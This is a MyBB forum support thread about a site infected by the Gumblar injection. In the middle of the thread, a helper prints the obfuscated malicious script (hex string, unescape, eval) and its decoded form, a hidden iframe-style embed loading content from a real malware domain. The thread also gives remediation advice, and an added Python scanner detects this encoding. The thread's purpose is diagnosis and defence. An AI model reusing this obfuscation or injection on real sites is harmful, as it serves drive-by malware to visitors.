MyBB Community Forums

Full Version: detected: malware on my forum , helppp me
When I load my forum, my antivirus pops up a message saying "detected: malware URL: <snip>". What to do? Help me please...
It also happens to me =/
What do we need to do now? I really don't understand....
Are you using plugins?
Which plugins? I think I have not used any, it is all default.
Akismet (1.2.1)
Akismet is a program that helps prevent SPAM on your forum.
Created by MyBB Group Deactivate Uninstall

Dynamic Metas (1.1)
How to make money online | Earn money online | Earn money on web | Earn money from home,
Created by CrazyCat Deactivate

Hello World! (1.0)
A sample plugin that prints hello world and prepends the content of each post to 'Hello world!'
Created by MyBB Group

Only these things, nothing else I am using.
vaibhavmeswani, the link that you posted wasn't even to a MyBB page on your website. I've removed it to prevent users here downloading the malware.

This script is the problem:

<script>
gFQgq='d 6f 63ume 6e 74 2e 77r 69 74e( 22 3cd 69v 20 73 74 79le 3d 5c" 70osi 74i 6fn 3aa 62s 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 2d 310 30 30px 3b 20 74 6fp: 2d 3100 30p 78 3b 5c 22 3e 22 29; 64 6fc 75me 6e 74 2e 77r 69 74e 28 27 3c 65 6d 62 65 64 20 77 69 64 74 68 3d 31 30 30 20 68 65ig 68 74= 31 300 20 73 72 63= 22 68 74t 70 3a 2f/ 67 75 6db 6c 61 72 2ecn 2frs 73/ 3f 69 64 3d2 22 20typ 65 3d"a 70p 6c 69 63a 74 69 6f 6e 2f 70 64 66" 3e 3c/ 65 6d 62 65d 3e 27) 3b 64 6f 63 75m 65 6e 74 2e 77 72i 74e( 27 3c 65m 62ed 20 77 69d 74 68 3d10 30 20 68 65i 67 68 74= 31 30 30 20sr 63 3d 22 68 74tp:// 67 75 6d 62 6ca 72 2ecn 2fr 73s/ 3f 69 64 3d 33 22 3e 3c 2f 65 6d 62 65 64 3e 27 29;d 6fc 75m 65 6et.wri 74 65( 22 3c 2fd 69v 3e 22 29;';GPoX=String.fromCharCode(33+4);GYk0=gFQgq.replace(/([\s])/g,GPoX+'25');GPoX=unescape(GYk0);Eiq=unescape(GPoX);eval/**/(Eiq);

//</script>

Currently MyBB 1.4.6 has no known vulnerabilities. Make sure that your forum is up to date with the latest version, your folders and files are CHMOD correctly and you have secure passwords for all your server/host log in details.

If you can tell us a page that has MyBB "infected" then please post it here. Normally this is just a template, or language file, that has been compromised and it can easily be removed.
There is not any particular page. When I type my site name and visit my site, Kaspersky pops up that detected message, so can you log in and solve this problem, as I am not from a programming background?
I just checked whether my version is updated or not, and it is not the latest one, so I downloaded the new one, but how do I install the new version without losing my data?
Please follow the upgrade steps that can be found on the MyBB Wiki.
[Wiki: Upgrading] (Broken link, head over to docs.mybb.com instead)
The script provided decodes to this:

document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
document.write('<embed width=100 height=100 src="http://gumblar.cn/rss/?id=2" type="application/pdf"></embed>');
document.write('<embed width=100 height=100 src="http://gumblar.cn/rss/?id=3"></embed>');
document.write("</div>");

<div style="position:absolute; left:-1000px; top:-1000px;">
<embed width=100 height=100 src="http://gumblar.cn/rss/?id=2" type="application/pdf"></embed>
<embed width=100 height=100 src="http://gumblar.cn/rss/?id=3"></embed>
</div>

This has been quite common and it's called the gumblar hack. We've found that typically it's caused by the PC that is being used to upload files to the website for updates, etc.

What's happening is that the PC you're using to update your website is infected and it's sniffing the FTP traffic between your PC and your website. Since FTP sends the username and password in plain text (it's not encrypted), the virus can see the login credentials, records them, and sends them to someone who plugs them into an automated program that logs into your website as you, then embeds their malscript into your site in various places. We've seen it embed in .js (javascript includes), .php (PHP files) as well as .htm and .html files.

I recommend you scan your PC in Safe Mode with AVG or Avast, clean it, then switch to using SSH and WinSCP to transfer your files. SSH/SCP does not send username and password as plain text. It encrypts your login credentials so this hack will not work any longer. Stay away from FTP!
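
For checking the file types mentioned above (.js, .php, .htm, .html) for this kind of injection, here is an added example that is not part of the original thread: it statically decodes the space-and-hex obfuscation shown earlier, without running the script, and lists the external hosts the decoded code would load. The function names, the eight-pair threshold and the sample (which uses the placeholder host example.invalid) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# A single-quoted JS literal containing at least 8 "<whitespace><two hex digits>" runs.
LITERAL = re.compile(r"'((?:[^'\\\s]*\s[0-9a-fA-F]{2}){8,}[^'\\]*)'")
SRC_URL = re.compile(r"""src=["']?(https?://[^"'\s>]+)""", re.I)

def decode_space_hex(blob):
    """Undo the obfuscation statically: whitespace -> '%', then percent-decode.
    Same result as the script's replace() plus two unescape() calls, with no eval."""
    return unquote(re.sub(r"\s", "%", blob), encoding="latin-1")

def scan(text, allowed_hosts=()):
    """Return [(decoded_js, [hosts not in allowed_hosts])] per suspicious literal."""
    if "unescape" not in text or "eval" not in text:
        return []
    findings = []
    for m in LITERAL.finditer(text):
        decoded = decode_space_hex(m.group(1))
        hosts = {h for u in SRC_URL.findall(decoded) if (h := urlsplit(u).hostname)}
        hosts = sorted(hosts - set(allowed_hosts))
        if "document.write" in decoded or hosts:
            findings.append((decoded, hosts))
    return findings

# Constructed sample (not taken from the thread): same encoding scheme,
# harmless placeholder host under the reserved .invalid TLD.
SAMPLE = r"""<html><body>Forum index</body>
<script>
qZ='d 6fcument.write( 27 3cembed 20src 3d 22http 3a 2f 2fexample.invalid 2fx 22 3e 3c 2fembed 3e 27);';p=String.fromCharCode(37);s=qZ.replace(/([\s])/g,p+'25');eval(unescape(unescape(s)));
</script></html>"""

if __name__ == "__main__":
    for decoded, hosts in scan(SAMPLE):
        print("injected script decodes to:", decoded)
        print("external hosts:", ", ".join(hosts))
```

Run scan() over the contents of each file in a clean download of the web root, passing your own domains as allowed_hosts; any file that returns a finding should be compared against a known-good copy.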
OK, will try this, and thanks.